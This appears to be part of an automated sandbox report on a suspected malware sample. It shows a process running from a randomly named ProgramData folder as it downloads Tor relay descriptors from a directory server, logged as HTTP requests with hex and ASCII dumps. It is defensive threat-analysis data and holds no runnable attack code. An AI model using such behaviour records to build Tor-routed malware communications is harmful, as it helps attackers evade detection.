74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 33 3a 31 33 3a 32 36 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 44 33 45 39 20 46 38 36 37 20 44 44 46 32 20 38 44 45 31 20 39 31 45 41 20 36 31 31 46 20 44 33 36 30 20 33 35 33 43 20 38 33 38 34 20 46 38 41 42 0a 75 70 74 69 6d 65 20 37 38 31 0a 62 61 6e 64 77 69 64 74 68 20 35 31 32 30 30 30 20 36 31 34 34 30 30 20 34 38 37 31 35 30 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 36 45 39 31 45 32 42 37 41 31 42 38 30 38 39 46 45 41 32 31 43 36 39 37 30 30 33 38 46 44 33 34 41 33 43 31 36 36 39 34 20 62 31 78 61 39 57 32 5a 56 46 78 6c 36 2f 65 54 73 35 2f 75 4b 58 6d 57 7a 6a 4c 41 2b 77 6e 56 42 69 64 59 31 59 38 65 4c 44 4d 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 61 5a 6a 45 6e 47 38 78 58 4f 53 51 42 53 58 63 68 79 39 6f 48 67 4c 75 47 4e 7a 66 6b 4f 6b 48 50 35 46 70 72 4a 64 56 71 64 38 37 42 31 51 68 48 77 33 75 2f 69 0a 4f 6a 75 51 73 2f 4b 69 41 30 51 34 2f 47 2b 67 57 75 69 43 33 78 68 6d 43 2b 6a 69 69 68 50 64 54 70 56 34 64 45 58 4d 63 66 73 78 6c 32 2f 6d 72 2b 6b 67 48 32 53 56 54 37 30 69 74 79 77 32 0a 62 4f 69 4e 57 41 2b 6d 7a 71 7a 76 47 6f 37 38 49 31 45 56 44 50 69 47 7a 42 75 46 47 78 4b 55 50 6e 49 73 74 6d 79 72 62 74 36 6a 57 5a 79 4a 7a 39 4e 42 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 2f 67 7a 73 74 58 70 55 61 41 4c 68 6a 51 77 6d 77 48 71 4a
                          Data Ascii: router transtbb 84.155.152.82 14074 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxV6AQFVLbRbCeZ604P2tD8pIBGQNrOtjXuIZMasp0fB/c6QAQAgBABo560RR9EGj3UAYvjPvduapVWIOEW1OoPjpEGKO6AZpydJVYo/2124yMtbXNCthtdwqJ6tgsvpVrtpeOVMmlO4RUXBZZvPI9hXFNRwge87hzCcAcBmQtphX60ZYTf3UQk=-----END ED25519 CERT-----master-key-ed25519 aOetEUfRBo91AGL4z73bmqVViDhFtTqD46RBijugGacplatform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 03:13:26fingerprint D3E9 F867 DDF2 8DE1 91EA 611F D360 353C 8384 F8ABuptime 781bandwidth 512000 614400 487150extra-info-digest 6E91E2B7A1B8089FEA21C6970038FD34A3C16694 b1xa9W2ZVFxl6/eTs5/uKXmWzjLA+wnVBidY1Y8eLDMonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBANaZjEnG8xXOSQBSXchy9oHgLuGNzfkOkHP5FprJdVqd87B1QhHw3u/iOjuQs/KiA0Q4/G+gWuiC3xhmC+jiihPdTpV4dEXMcfsxl2/mr+kgH2SVT70ityw2bOiNWA+mzqzvGo78I1EVDPiGzBuFGxKUPnIstmyrbt6jWZyJz9NBAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAL/gzstXpUaALhjQwmwHqJ


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          29192.168.2.34973077.7.81.1409030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:27.795428038 CET5289OUTGET /tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6f HTTP/1.0
                          Host: 77.7.81.140
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:27.843314886 CET5291INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:27 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:27 GMT
                          Data Raw: 72 6f 75 74 65 72 20 6f 6e 69 6f 6e 44 41 4f 72 65 6c 30 61 64 65 64 31 20 35 2e 32 2e 37 39 2e 31 39 30 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 56 74 41 5a 7a 70 74 41 56 55 39 5a 46 59 38 55 37 64 6e 6a 70 51 52 55 6d 73 47 42 7a 44 56 69 46 2b 79 64 6b 42 58 74 6a 51 52 4e 2f 6b 41 51 41 67 42 41 44 55 75 45 66 41 0a 42 5a 4f 6a 31 6c 65 6c 33 7a 42 72 50 64 74 76 66 72 45 59 32 51 77 6d 56 31 63 34 48 6b 42 56 6f 68 68 54 33 74 68 56 65 31 69 68 59 59 79 64 79 61 72 44 73 31 42 79 54 52 74 63 74 75 38 73 0a 43 69 59 6b 6c 43 52 33 63 4c 48 46 37 6c 44 34 6d 31 6e 6c 4e 70 45 30 7a 6d 78 6b 76 38 48 45 4a 4e 46 6d 32 56 6f 77 74 43 59 69 32 78 67 47 50 4a 6b 70 73 39 69 58 49 41 34 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 31 4c 68 48 77 41 57 54 6f 39 5a 58 70 64 38 77 61 7a 33 62 62 33 36 78 47 4e 6b 4d 4a 6c 64 58 4f 42 35 41 56 61 49 59 55 39 34 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 30 3a 32 32 3a 34 33 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 30 32 41 38 20 43 43 42 31 20 46 42 37 30 20 39 38 34 32 20 32 36 32 33 20 31 32 38 33 20 35 39 36 44 20 41 37 33 34 20 41 38 30 45 20 33 46 36 46 0a 75 70 74 69 6d 65 20 32 34 30 31 32 31 34 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 32 33 33 30 38 36 37 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 33 39 33 31 35 37 36 38 39 34 32 36 30 32 43 37 43 34 36 33 34 46 41 30 43 39 33 44 32 43 39 35 30 41 39 45 44 38 30 38 20 6e 33 38 6a 72 6a 50 66 35 48 38 67 6c 64 4e 46 66 72 2b 41 75 34 4e 7a 33 65 33 36 32 55 74 42 63 4a 50 7a 6e 4c 43 56 76 73 49 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 68 64 30 51 51 51 36 53 61 57 52 6b 4f 6f 52 76 35 76 54 45 68 2b 4f 63 73 36 4d 75 67 4b 58 59 75 68 69 70 70 77 39 64 76 74 48 7a 46 6f 2b 43 73 6e 67 38 36 4e 0a 78 62 6c 6c 77 45 4a 65 39 2b 71 4f 55 44 2b 56 43 39 2b 67 79 7a 6c 2b 71 44 79 6e 6e 51 33 38 77 71 31 66 4e 6a 48 54 36 36 64 63 51 4e 68 57 54 76 78 38 54 30 66 42 53 44 75 6e 73 64 2f 32 0a 2b 45 35 75 41 72 64 48 33 53 6f 37 56 52 48 56 65 58 2b 57 58 71 47 56 64 69 57 64 46 76 43 4e 76 4d 42 6e 6d 5a 54 50 72 72 36 75 37 4a 39 53 37 51 35 50 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 38 48
                          Data Ascii: router onionDAOrel0aded1 5.2.79.190 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxVtAZzptAVU9ZFY8U7dnjpQRUmsGBzDViF+ydkBXtjQRN/kAQAgBADUuEfABZOj1lel3zBrPdtvfrEY2QwmV1c4HkBVohhT3thVe1ihYYydyarDs1ByTRtctu8sCiYklCR3cLHF7lD4m1nlNpE0zmxkv8HEJNFm2VowtCYi2xgGPJkps9iXIA4=-----END ED25519 CERT-----master-key-ed25519 1LhHwAWTo9ZXpd8waz3bb36xGNkMJldXOB5AVaIYU94platform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 00:22:43fingerprint 02A8 CCB1 FB70 9842 2623 1283 596D A734 A80E 3F6Fuptime 2401214bandwidth 1073741824 1073741824 2330867extra-info-digest 39315768942602C7C4634FA0C93D2C950A9ED808 n38jrjPf5H8gldNFfr+Au4Nz3e362UtBcJPznLCVvsIonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKhd0QQQ6SaWRkOoRv5vTEh+Ocs6MugKXYuhippw9dvtHzFo+Csng86NxbllwEJe9+qOUD+VC9+gyzl+qDynnQ38wq1fNjHT66dcQNhWTvx8T0fBSDunsd/2+E5uArdH3So7VRHVeX+WXqGVdiWdFvCNvMBnmZTPrr6u7J9S7Q5PAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAL8H


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          3192.168.2.34975723.128.64.141443C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          30192.168.2.34973177.7.81.1409030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:28.461570978 CET5298OUTGET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0
                          Host: 77.7.81.140
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:28.509443998 CET5300INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:28 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:28 GMT
                          Data Raw: 72 6f 75 74 65 72 20 74 72 61 6e 73 74 62 62 20 38 34 2e 31 35 35 2e 31 35 32 2e 38 32 20 31 34 30 37 34 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 56 36 41 51 46 56 4c 62 52 62 43 65 5a 36 30 34 50 32 74 44 38 70 49 42 47 51 4e 72 4f 74 6a 58 75 49 5a 4d 61 73 70 30 66 42 2f 63 36 51 41 51 41 67 42 41 42 6f 35 36 30 52 0a 52 39 45 47 6a 33 55 41 59 76 6a 50 76 64 75 61 70 56 57 49 4f 45 57 31 4f 6f 50 6a 70 45 47 4b 4f 36 41 5a 70 79 64 4a 56 59 6f 2f 32 31 32 34 79 4d 74 62 58 4e 43 74 68 74 64 77 71 4a 36 74 0a 67 73 76 70 56 72 74 70 65 4f 56 4d 6d 6c 4f 34 52 55 58 42 5a 5a 76 50 49 39 68 58 46 4e 52 77 67 65 38 37 68 7a 43 63 41 63 42 6d 51 74 70 68 58 36 30 5a 59 54 66 33 55 51 6b 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 61 4f 65 74 45 55 66 52 42 6f 39 31 41 47 4c 34 7a 37 33 62 6d 71 56 56 69 44 68 46 74 54 71 44 34 36 52 42 69 6a 75 67 47 61 63 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 33 3a 31 33 3a 32 36 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 44 33 45 39 20 46 38 36 37 20 44 44 46 32 20 38 44 45 31 20 39 31 45 41 20 36 31 31 46 20 44 33 36 30 20 33 35 33 43 20 38 33 38 34 20 46 38 41 42 0a 75 70 74 69 6d 65 20 37 38 31 0a 62 61 6e 64 77 69 64 74 68 20 35 31 32 30 30 30 20 36 31 34 34 30 30 20 34 38 37 31 35 30 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 36 45 39 31 45 32 42 37 41 31 42 38 30 38 39 46 45 41 32 31 43 36 39 37 30 30 33 38 46 44 33 34 41 33 43 31 36 36 39 34 20 62 31 78 61 39 57 32 5a 56 46 78 6c 36 2f 65 54 73 35 2f 75 4b 58 6d 57 7a 6a 4c 41 2b 77 6e 56 42 69 64 59 31 59 38 65 4c 44 4d 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4e 61 5a 6a 45 6e 47 38 78 58 4f 53 51 42 53 58 63 68 79 39 6f 48 67 4c 75 47 4e 7a 66 6b 4f 6b 48 50 35 46 70 72 4a 64 56 71 64 38 37 42 31 51 68 48 77 33 75 2f 69 0a 4f 6a 75 51 73 2f 4b 69 41 30 51 34 2f 47 2b 67 57 75 69 43 33 78 68 6d 43 2b 6a 69 69 68 50 64 54 70 56 34 64 45 58 4d 63 66 73 78 6c 32 2f 6d 72 2b 6b 67 48 32 53 56 54 37 30 69 74 79 77 32 0a 62 4f 69 4e 57 41 2b 6d 7a 71 7a 76 47 6f 37 38 49 31 45 56 44 50 69 47 7a 42 75 46 47 78 4b 55 50 6e 49 73 74 6d 79 72 62 74 36 6a 57 5a 79 4a 7a 39 4e 42 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 2f 67 7a 73 74 58 70 55 61 41 4c 68 6a 51 77 6d 77 48 71 4a
                          Data Ascii: router transtbb 84.155.152.82 14074 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxV6AQFVLbRbCeZ604P2tD8pIBGQNrOtjXuIZMasp0fB/c6QAQAgBABo560RR9EGj3UAYvjPvduapVWIOEW1OoPjpEGKO6AZpydJVYo/2124yMtbXNCthtdwqJ6tgsvpVrtpeOVMmlO4RUXBZZvPI9hXFNRwge87hzCcAcBmQtphX60ZYTf3UQk=-----END ED25519 CERT-----master-key-ed25519 aOetEUfRBo91AGL4z73bmqVViDhFtTqD46RBijugGacplatform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 03:13:26fingerprint D3E9 F867 DDF2 8DE1 91EA 611F D360 353C 8384 F8ABuptime 781bandwidth 512000 614400 487150extra-info-digest 6E91E2B7A1B8089FEA21C6970038FD34A3C16694 b1xa9W2ZVFxl6/eTs5/uKXmWzjLA+wnVBidY1Y8eLDMonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBANaZjEnG8xXOSQBSXchy9oHgLuGNzfkOkHP5FprJdVqd87B1QhHw3u/iOjuQs/KiA0Q4/G+gWuiC3xhmC+jiihPdTpV4dEXMcfsxl2/mr+kgH2SVT70ityw2bOiNWA+mzqzvGo78I1EVDPiGzBuFGxKUPnIstmyrbt6jWZyJz9NBAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAL/gzstXpUaALhjQwmwHqJ


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          31192.168.2.34973277.7.81.1409030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:28.699011087 CET5303OUTGET /tor/server/fp/02b2152129686ae0be05f3d1460591dd71c4bb15 HTTP/1.0
                          Host: 77.7.81.140
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:28.748817921 CET5305INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:28 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:28 GMT
                          Data Raw: 72 6f 75 74 65 72 20 30 78 36 37 37 32 36 35 37 39 20 38 39 2e 35 38 2e 36 30 2e 32 30 38 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 61 45 41 62 44 46 54 42 6c 38 6a 66 42 77 56 44 37 65 38 74 51 4e 6c 4a 68 56 53 48 44 51 43 43 75 71 79 78 31 2f 7a 66 4b 55 6b 6c 67 59 41 51 41 67 42 41 44 57 4c 54 30 59 0a 50 46 35 65 64 59 36 53 76 55 62 69 71 70 47 4a 75 67 55 6e 4e 71 68 48 32 73 69 2b 31 2f 67 46 61 57 58 66 30 4a 66 59 42 6d 4b 42 49 52 57 70 78 4b 62 44 4e 42 44 39 58 39 5a 6d 61 62 43 6f 0a 76 61 49 77 50 71 6a 39 57 56 35 57 2f 4d 66 43 77 34 71 6d 70 64 58 72 5a 75 77 5a 46 34 4d 48 53 6e 78 68 6e 4e 57 6d 57 46 6a 31 2f 4c 30 68 48 74 6e 7a 52 6b 63 67 46 77 73 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 31 69 30 39 47 44 78 65 58 6e 57 4f 6b 72 31 47 34 71 71 52 69 62 6f 46 4a 7a 61 6f 52 39 72 49 76 74 66 34 42 57 6c 6c 33 39 41 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 61 3a 34 63 63 30 3a 31 3a 32 65 38 3a 34 33 30 3a 64 30 66 66 3a 66 65 31 36 3a 61 66 34 66 5d 3a 39 30 30 31 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 32 3a 31 30 3a 31 39 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 30 32 42 32 20 31 35 32 31 20 32 39 36 38 20 36 41 45 30 20 42 45 30 35 20 46 33 44 31 20 34 36 30 35 20 39 31 44 44 20 37 31 43 34 20 42 42 31 35 0a 75 70 74 69 6d 65 20 36 34 38 32 30 37 0a 62 61 6e 64 77 69 64 74 68 20 31 32 35 38 32 39 31 32 20 31 36 37 37 37 32 31 36 20 31 32 36 33 32 39 32 32 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 46 44 41 44 39 38 34 31 36 46 42 36 38 37 37 34 45 30 30 35 39 44 42 39 32 42 35 35 43 41 37 43 34 42 41 36 45 42 42 37 20 67 42 76 58 68 30 4f 62 74 6b 41 33 6a 6b 6e 4b 49 7a 59 46 6a 5a 4e 4b 46 67 65 62 56 4b 49 63 4a 75 76 38 4a 70 32 50 7a 6e 73 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4f 44 4f 36 47 34 39 33 44 44 6a 2f 36 4a 6d 52 76 33 6b 38 2f 61 51 68 57 42 72 72 73 6d 51 4c 51 64 52 56 67 35 73 33 44 6a 61 6d 55 51 41 4d 4f 64 48 41 61 63 41 0a 55 73 63 57 46 4a 56 47 2f 4c 69 61 4b 57 66 45 65 42 59 6b 42 65 54 35 45 49 70 76 50 49 32 31 55 2f 4d 42 55 53 45 4c 57 74 51 68 6a 57 56 6b 45 73 71 4a 5a 32 52 48 63 77 50 44 51 76 6e 76 0a 6e 4b 37 46 31 7a 43 61 6c 38 75 64 4b 50 6e 34 39 61 56 61 33 72 56 43 30 4c 50 32 4d 53 57 46 66 66 74 63 2f 53 71 42 35 54 36 64 7a 4d 73 41 51 6a 38 4a 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79
                          Data Ascii: router 0x67726579 89.58.60.208 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxaEAbDFTBl8jfBwVD7e8tQNlJhVSHDQCCuqyx1/zfKUklgYAQAgBADWLT0YPF5edY6SvUbiqpGJugUnNqhH2si+1/gFaWXf0JfYBmKBIRWpxKbDNBD9X9ZmabCovaIwPqj9WV5W/MfCw4qmpdXrZuwZF4MHSnxhnNWmWFj1/L0hHtnzRkcgFws=-----END ED25519 CERT-----master-key-ed25519 1i09GDxeXnWOkr1G4qqRiboFJzaoR9rIvtf4BWll39Aor-address [2a0a:4cc0:1:2e8:430:d0ff:fe16:af4f]:9001platform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 02:10:19fingerprint 02B2 1521 2968 6AE0 BE05 F3D1 4605 91DD 71C4 BB15uptime 648207bandwidth 12582912 16777216 12632922extra-info-digest FDAD98416FB68774E0059DB92B55CA7C4BA6EBB7 gBvXh0ObtkA3jknKIzYFjZNKFgebVKIcJuv8Jp2Pznsonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAODO6G493DDj/6JmRv3k8/aQhWBrrsmQLQdRVg5s3DjamUQAMOdHAacAUscWFJVG/LiaKWfEeBYkBeT5EIpvPI21U/MBUSELWtQhjWVkEsqJZ2RHcwPDQvnvnK7F1zCal8udKPn49aVa3rVC0LP2MSWFfftc/SqB5T6dzMsAQj8JAgMBAAE=-----END RSA PUBLIC KEY-----signing-key


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          32192.168.2.34973377.7.81.1409030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:29.211570024 CET5311OUTGET /tor/server/fp/d3e9f867ddf28de191ea611fd360353c8384f8ab HTTP/1.0
                          Host: 77.7.81.140
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:29.259649992 CET5313INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:29 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:29 GMT
                          Data Raw: 72 6f 75 74 65 72 20 74 72 61 6e 73 74 62 62 20 38 34 2e 31 35 35 2e 31 35 32 2e 38 32 20 31 34 30 37 34 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 56 36 41 51 46 56 4c 62 52 62 43 65 5a 36 30 34 50 32 74 44 38 70 49 42 47 51 4e 72 4f 74 6a 58 75 49 5a 4d 61 73 70 30 66 42 2f 63 36 51 41 51 41 67 42 41 42 6f 35 36 30 52 0a 52 39 45 47 6a 33 55 41 59 76 6a 50 76 64 75 61 70 56 57 49 4f 45 57 31 4f 6f 50 6a 70 45 47 4b 4f 36 41 5a 70 79 64 4a 56 59 6f 2f 32 31 32 34 79 4d 74 62 58 4e 43 74 68 74 64 77 71 4a 36 74 0a 67 73 76 70 56 72 74 70 65 4f 56 4d 6d 6c 4f 34 52 55 58 42 5a 5a 76 50 49 39 68 58 46 4e 52 77 67 65 38 37 68 7a 43 63 41 63 42 6d 51 74 70 68 58 36 30 5a 59 54 66 33 55 51 6b 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 61 4f 65 74 45 55 66 52 42 6f 39 31 41 47 4c 34 7a 37 33 62 6d 71 56 56 69 44 68 46 74 54 71 44 34 36 52 42 69 6a 75 67 47 61 63 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 